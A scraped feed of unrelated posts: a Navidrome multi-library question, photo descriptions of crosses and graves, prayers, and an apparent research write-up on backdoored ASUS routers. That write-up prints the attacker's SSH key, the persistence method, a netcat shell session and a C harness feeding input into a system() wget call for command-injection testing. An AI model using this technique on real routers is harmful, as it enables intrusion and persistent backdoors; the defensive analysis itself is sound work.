Been using navidrome for years, and I'm excited about implementing multi-library support. I have a ton of music and I want to create a personal library that is only a subset of artists from the parent library. ...
Some questions to help explore if i was in your shoes:
Are these internal playlists (db) or external playlists (m3u)?
if external playlists- do they list the full filepath or just the relative file path? (Youd want relative)
does the user have access to both libraries? from the docs:
Playlists: Can contain songs from multiple libraries (user must have access)
Smart Playlists: Can be scoped to specific libraries using filters
I haven't experimented with multi library support but that first bullet point makes me think that (db) playlists might be tied to the original library song, and navidrome is expecting the user to have access to that library to play those songs even if the songs exist separately in the current library via symlinks. The second copy of those songs are likely treated as second entries in the db even if they ultimately are the same file.
An alternative approach would be to create a backup of the db, and then delete the symlinks, delete the "missing songs" from the navidrome ui, and then move the song files to the new library. Right now you're thinking of doing a parent library (all files) plus a child library (selective files from parent), but id treat the default library as "core" songs everyone should have access to, and then a second "personal" library for your specific songs. The caveat is i don't know if navidrome will be able to tell the songs moved from one library to another. If not, then this could be pretty messy if you're wanting to keep annotations and playlists which is why i suggest a backup.
A striking landscape photograph capturing a winding dirt path that leads uphill toward a prominent cross perched atop a grassy hill. The path is flanked by rugged, weathered limestone walls, creating a natural corridor that draws the eye toward the cross. The limestone formations are textured and uneven, adding a sense of age and history to the scene. Low, green shrubs and bushes line the base of the walls, contrasting with the earthy tones of the path and stone. The sky above is overcast, casting a soft, diffused light over the rolling hills and distant horizon, which adds a serene and contemplative atmosphere to the image.
G.
Graveyard with Cat in Moonlight, in celebration of Halloween.
Sketching new,old and abandoned graves, some pristine, some neglected . A cat ran ahead of me, then stood on top of a flat gravestone, outlined in light, casting a dark shadow.
My interpretation is of this scene at night, with a full moon.
G.
Graveyard with Cat in Moonlight, in celebration of Halloween.
Sketching new,old and abandoned graves, some pristine, some neglected . A cat ran ahead of me, then stood on top of a flat gravestone, outlined in light, casting a dark shadow.
My interpretation is of this scene at night, with a full moon.
A wooden cross surrounded by red carnations and greenery, on an altar. A gospel book lies before it, bound in gilt with enamel icons. Behind it is a seven-branched candelabra. The altar table is covered in red brocade cloth.
@ossobuffo I am a Southern Baptist, so I am not familiar with this particular feast or celebration. Would you mind enlightening me as to the purpose of the celebration.
From from quick reading, I wonder if it has to do with when the "true cross" of Jesus was discovered by Constatine's mother. I am not convinced that this was the actual cross that Jesus was crucified on, but I also have no reason to doubt it could be.
Anyway, I would love to understand the purpose of the feast. Thank you #cross
A weathered, ornate white cross stands in the foreground, with a quaint, small church in the background. The structure is blurred, emphasizing the cross and its detailed design. This is one of the many old churches and cemeteries in Iceland.
A weathered, ornate white cross stands in the foreground, with a quaint, small church in the background. The structure is blurred, emphasizing the cross and its detailed design.
I’m not the only one who has noticed this vulnerability. A full write-up analyzing this critical design flaw is available here: https://leeyabug.top/ASUS-SQLI
Wed, Feb 19, 11:44 —— ASUS confirmed the vul, will add a hall of fame and assign a CVE. discovered by leeya_bug
If I wanted to ensure multiple ways to regain access to a router after being locked out, this would be an effective approach.
This payload leverages built-in ASUS router features to enable SSH on both LAN and WAN, bind it to TCP/53282, and add an attacker-controlled public key::
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAo41nBoVFfj4HlVMGV+YPsxMDrMlbdDZJ8L5mzhhaxfGzpHR8Geay/xDlVDSJ8MJwA4RJ7o21KVfRXqFblQH4L6fWIYd1ClQbZ6Kk1uA1r7qx1qEQ2PqdVMhnNdHACvCVz/MPHTVebtkKhEl98MZiMOvUNPtAC9ppzOSi7xz3cSV0n1pG/dj+37pzuZUpm4oGJ3XQR2tUPz5MddupjJq9/gmKH6SJjTrHKSECe5yEDs6c3v6uN4dnFNYA5MPZ52FGbkhzQ5fy4dPNf0peszR28XGkZk9ctORNCGXZZ4bEkGHYut5uvwVK1KZOYJRmmj63drEgdIioFv/x6IcCcKgi2w== rsa 2048-020623
Because this key is added using the official ASUS features, this config change is persisted across firmware upgrades. If you’ve been exploited previously, upgrading your firmware will NOT remove the SSH backdoor.
Can you prove that the 4,853 (and steadily increasing) hosts from this Censys search are actually backdoored with this SSH pubkey?
Yes. One of the features of sshamble by runZero is the ability to take a pubkey attacker.pub and a username, and determine if the remote host has the associated pubkey inserted.
In this case, the attacker possesses information we do not—specifically, the username. We suspect this was gathered earlier through brute force attacks. With a sample size of ~5,000, it is likely that at least one user chose “admin” as their username.
And sure enough, someone has. We can confirm that the attacker controlled pubkey has been installed for the admin user on the remote machine on TCP/53282. Something privileged that has absolutely no business being there.
After obtaining a physical ASUS RT-AX55 (which is affected by the identified CVE-2023-39780), we used the above payloads to execute commands and spawn a netcat listener without any issues.
Starting Nmap 7.80 ( https://nmap.org/ ) at 2025-03-21 13:10 EDT
Nmap scan report for RT-AX55-4960 (192.168.50.1)
Host is up (0.012s latency).
PORT STATE SERVICE
1111/tcp open lmsocialserver
Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds
remy@remy-XPS-13-9310:~$ nc -vvv 192.168.50.1 1111
Connection to 192.168.50.1 1111 port [tcp/*] succeeded!
��������
badmin@RT-AX55-4960:/tmp/bwdpi# ls
ls
app_patrol.conf bwdpi.rule.db key.enc tmfbe_workdir
bwdpi.app.db dcd.conf libshn_pctrl.so wred.conf
bwdpi.appdb.db dcd.pid model.enc wred.pid
bwdpi.beh.db dcd.stat ntdasus2014.cert
bwdpi.cat.db dev_wan rule.version
bwdpi.devdb.db guid shn.pem
taking ARMs against a sea of troubles
While updating my new ASUS RT-AX55 to the latest firmware, I noticed a recent security update released just three days ago.
Unfortunately, the download link is broken and returns a 404 error.
Shortly afterward, the download description and link disappeared entirely.
So, I installed the latest available version and moved on. (Of course, that didn’t solve the issue.)
Patch Diffing
I do have FW_RT_AX55_300438651598.zip and FW_RT_AX55_300438652332.zip(newest) firmwares available. A quick unblob / binwalk makes quick work of extracting the squashfs-root filesystem.
The old vulnerable function looks a bit like this:
The newest patch available just wraps the above code in an if statement from an external function is_valid_auth_code from /usr/lib/libshared.so
if (is_valid_oauth_code()){
//Same code as before
}
Authors Note: While not directly relevant to our current investigation, --no-check-certificate on the wget command means that your Google OAuth token is sent to a remote server without validating the SSL/TLS certificate. This has implications.
We grab a cross-compiler toolchain for a compatible GLIBC version from https://toolchains.bootlin.com/ and cross-compile an ARM binary that will load libshared.so, dumping a list of valid characters from the new gatekeeper function, prompting us to allow playing with the input, and passing the input through the same snprintf and system calls as in the original binary.
int main()
{
void *handle;
int (*oc)(char *); // Function pointer with return type int
char *error;
char input[MAX_INPUT];
int result;
__uint8_t curChar;
// Open the shared object file
handle = dlopen("libshared.so", RTLD_LAZY);
if (!handle)
{
fprintf(stderr, "%s\n", dlerror());
return 1;
}
// Get a pointer to the is_valid_oauth_code function
oc = (int (*)(char *))dlsym(handle, "is_valid_oauth_code");
if ((error = dlerror()) != NULL)
{
fprintf(stderr, "%s\n", error);
dlclose(handle);
return 1;
}
for (uint16_t i = 0; i <= 0xFF; i++)
{
uint8_t byte_value = (uint8_t)i;
char char_value = (char)byte_value;
result = (*oc)(&char_value);
if (result)
{
printf("Value: %3u, Hex: 0x%02X, Char: %c\n", byte_value, byte_value, char_value);
}
}
// Get user input
while (1)
{
printf("Enter an oauth code: ");
if (fgets(input, MAX_INPUT, stdin) == NULL)
{
fprintf(stderr, "Error reading input\n");
dlclose(handle);
return 1;
}
// Remove newline character if present
input[strcspn(input, "\n")] = 0;
// Call the is_valid_oauth_code function with user input and store the result
result = (*oc)(input);
// Print the returned value
printf("Return value: %d\n", result);
if (result)
{
char buffer[1024];
int o = snprintf(&buffer,
1024,
"wget --no-check-certificate --timeout=%d --tries=%d --method POST --header 'content-type: application/x-www-form-urlencoded' --header 'cache-control: no-cache' --body-data 'refresh_token=%s&client_id=%s&client_secret=%s&grant_type=%s' --output-document=%s %s",
3,
1,
input,
"103584452676-437qj6gd8o9tuncit9h8h7cendd2eg58.apps.googleusercontent.com",
"xivDhVGSSHZ3LJMx228wdcDf",
"refresh_token",
"/tmp/oauth/google_access_token.json",
//IP for example.com since DNS resolver doesn't exist inside emulated sandbox
"http://23.215.0.136/AAAAAAAAAAAAAAAAAAA");
printf("Overflowed: %d", o);
printf("\n%s\n", buffer);
int e = system(buffer);
}
}
// Close the shared object
dlclose(handle);
return 0;
🛐*DEAR Heavenly Father!*as I meditate on all Your Son did for me!PLEASE help me also to trust in Your promise of forgiveness!& eternal life!*earned for me by Jesus!🙏🏻*In CHRIST JESUS name I pray!🛐💞🌏💞🛐*Amen!💫💞🌏💞💫
Antique iron cross blue with pealing blue paint exposing rust attached on a blue wooden door. An antiwue architectual detail found on many doors and buildings in Venice Italy. Situated close to the ocean Venice structures are exposed to salt water and humity.
Tomorrow: "How did #trade in late #medieval Maghribi port cities function within the frameworks of (religious) laws and #cross-cultural exchange?" With Joel Pattison + Maya Shatzmiller.
Cocharelli Codex, Italy, Genoa, 14th century - Leaf from a Cocharelli Treatise on the Vices- Accidia and Her Court - 1953.152 - Cleveland Museum of Art, Licence: CC0 1.0.
Symlinked multi-library breaks playlists
Been using navidrome for years, and I'm excited about implementing multi-library support. I have a ton of music and I want to create a personal library that is only a subset of artists from the parent library. ...
Thousands of Asus routers are being hit with stealthy, persistent backdoors ( arstechnica.com )
cross-posted from: ...